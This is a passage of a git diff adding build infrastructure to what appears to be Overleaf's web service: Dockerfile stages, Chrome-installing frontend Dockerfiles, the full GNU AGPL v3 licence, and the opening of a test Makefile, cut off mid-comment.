+COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && NODE_ENV=production npm ci --quiet + +FROM deps-prod AS deps + +ENV CYPRESS_INSTALL_BINARY=0 + +COPY tsconfig.backend.json /overleaf/ +RUN cd /overleaf && npm install + + +# the dev is suitable for running tests +FROM deps AS dev + +ARG SENTRY_RELEASE +ENV SENTRY_RELEASE=$SENTRY_RELEASE +COPY services/web /overleaf/services/web + +# Build the latex parser +RUN cd /overleaf/services/web && npm run 'lezer-latex:generate' + +USER node + + +# the webpack image has deps+src+webpack artifacts +FROM dev AS webpack +USER root +RUN OVERLEAF_CONFIG=/overleaf/services/web/config/settings.webpack.js nice npm run webpack:production + + +# intermediate image for removing source maps ahead of copying into final production image +FROM webpack AS webpack-no-sourcemaps +RUN nice find /overleaf/services/web/public -name '*.js.map' -delete + + +# copy source code and precompile pug images +FROM deps-prod AS pug +COPY services/web /overleaf/services/web +# Omit Server Pro/CE specific scripts from SaaS image +RUN rm /overleaf/services/web/modules/server-ce-scripts -rf +RUN OVERLEAF_CONFIG=/overleaf/services/web/config/settings.overrides.saas.js nice npm run precompile-pug + + +# the web image with only production dependencies but no webpack production build, for development +FROM pug AS app-only +USER node +CMD ["node", "--expose-gc", "app.mjs"] + + +# the final production image, with webpack production build but without source maps +FROM pug AS app +ARG SENTRY_RELEASE +ENV SENTRY_RELEASE=$SENTRY_RELEASE +COPY --from=webpack-no-sourcemaps /overleaf/services/web/public /overleaf/services/web/public +USER node +CMD ["node", "--expose-gc", "app.mjs"] diff --git a/services/web/Dockerfile.frontend b/services/web/Dockerfile.frontend new file mode 100644 index 0000000..0bdfd8c --- /dev/null +++ b/services/web/Dockerfile.frontend @@ -0,0 +1,6 @@ +FROM node:20.18.2 + +# Install Google Chrome +RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - +RUN sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' +RUN apt-get update && apt-get install -y google-chrome-stable diff --git a/services/web/Dockerfile.frontend.ci b/services/web/Dockerfile.frontend.ci new file mode 100644 index 0000000..140d2bc --- /dev/null +++ b/services/web/Dockerfile.frontend.ci @@ -0,0 +1,11 @@ +ARG PROJECT_NAME +ARG BRANCH_NAME +ARG BUILD_NUMBER + +FROM ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + +USER root + +RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - && \ + echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list && \ + apt-get update && apt-get install -y google-chrome-stable diff --git a/services/web/LICENSE b/services/web/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/web/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/web/Makefile b/services/web/Makefile new file mode 100644 index 0000000..c691604 --- /dev/null +++ b/services/web/Makefile @@ -0,0 +1,571 @@ +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = web +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') +PWD = $(shell pwd) + +export OVERLEAF_CONFIG ?= /overleaf/services/web/test/acceptance/config/settings.test.saas.js +export BASE_CONFIG ?= ${OVERLEAF_CONFIG} + +CFG_SAAS=/overleaf/services/web/test/acceptance/config/settings.test.saas.js +CFG_SERVER_CE=/overleaf/services/web/test/acceptance/config/settings.test.server-ce.js +CFG_SERVER_PRO=/overleaf/services/web/test/acceptance/config/settings.test.server-pro.js + +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +MODULE_DIRS := $(shell find modules -mindepth 1 -maxdepth 1 -type d -not -name '.git' ) +MODULE_MAKEFILES := $(MODULE_DIRS:=/Makefile) +MODULE_NAME=$(shell basename $(MODULE)) + +$(MODULE_MAKEFILES): Makefile.module + cp Makefile.module $@ || diff Makefile.module $@ + +# +# Clean +# + +clean: + -$(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_all_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_parallel_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_parallel_make_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_test_saas_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_test_server_ce_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_test_server_pro_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_1_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_2_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_3_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_4_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_server_ce_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_server_pro_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=test_frontend_ct_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=tar_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + +clean_ci: + $(DOCKER_COMPOSE) down -v -t 0 + docker container list | grep 'days ago' | cut -d ' ' -f 1 - | xargs -r docker container stop + docker image prune -af --filter "until=48h" + docker network prune -f + +# +# Tests +# + +test: test_unit test_acceptance test_frontend test_frontend_ct + +test_module: test_unit_module test_acceptance_module + +# +# Unit tests +# + +test_unit: test_unit_all +test_unit_all: export COMPOSE_PROJECT_NAME=unit_test_all_$(BUILD_DIR_NAME) +test_unit_all: + $(DOCKER_COMPOSE) run --rm test_unit npm run test:unit:all + $(DOCKER_COMPOSE) down -v -t 0 + +test_unit_all_silent: export COMPOSE_PROJECT_NAME=unit_test_all_$(BUILD_DIR_NAME) +test_unit_all_silent: + $(DOCKER_COMPOSE) run --rm test_unit npm run test:unit:all:silent + $(DOCKER_COMPOSE) down -v -t 0 + +test_unit_app: export COMPOSE_PROJECT_NAME=unit_test_$(BUILD_DIR_NAME) +test_unit_app: + $(DOCKER_COMPOSE) run --name unit_test_$(BUILD_DIR_NAME) --rm test_unit + $(DOCKER_COMPOSE) down -v -t 0 + +TEST_SUITES = $(sort $(filter-out \ + $(wildcard test/unit/src/helpers/*), \ + $(wildcard test/unit/src/*/*))) + +MOCHA_CMD_LINE = \ + mocha \ + --exit \ + --file test/unit/bootstrap.js \ + --grep=${MOCHA_GREP} \ + --reporter spec \ + --timeout 25000 \ + +.PHONY: $(TEST_SUITES) +$(TEST_SUITES): + $(MOCHA_CMD_LINE) $@ + +J ?= 1 +test_unit_app_parallel_gnu_make: $(TEST_SUITES) +test_unit_app_parallel_gnu_make_docker: export COMPOSE_PROJECT_NAME = \ + unit_test_parallel_make_$(BUILD_DIR_NAME) +test_unit_app_parallel_gnu_make_docker: + $(DOCKER_COMPOSE) run --rm test_unit \ + make test_unit_app_parallel_gnu_make --output-sync -j $(J) + $(DOCKER_COMPOSE) down -v -t 0 + +TEST_UNIT_MODULES = $(MODULE_DIRS:=/test_unit) +$(TEST_UNIT_MODULES): %/test_unit: %/Makefile +test_unit_modules: $(TEST_UNIT_MODULES) + +test_unit_module: + $(MAKE) modules/$(MODULE_NAME)/test_unit + + +# +# Frontend tests +# + +test_frontend: + COMPOSE_PROJECT_NAME=frontend_test_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) run --rm test_frontend + COMPOSE_PROJECT_NAME=frontend_test_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down -v -t 0 + +# +# Frontend component tests in Cypress +# +# Local 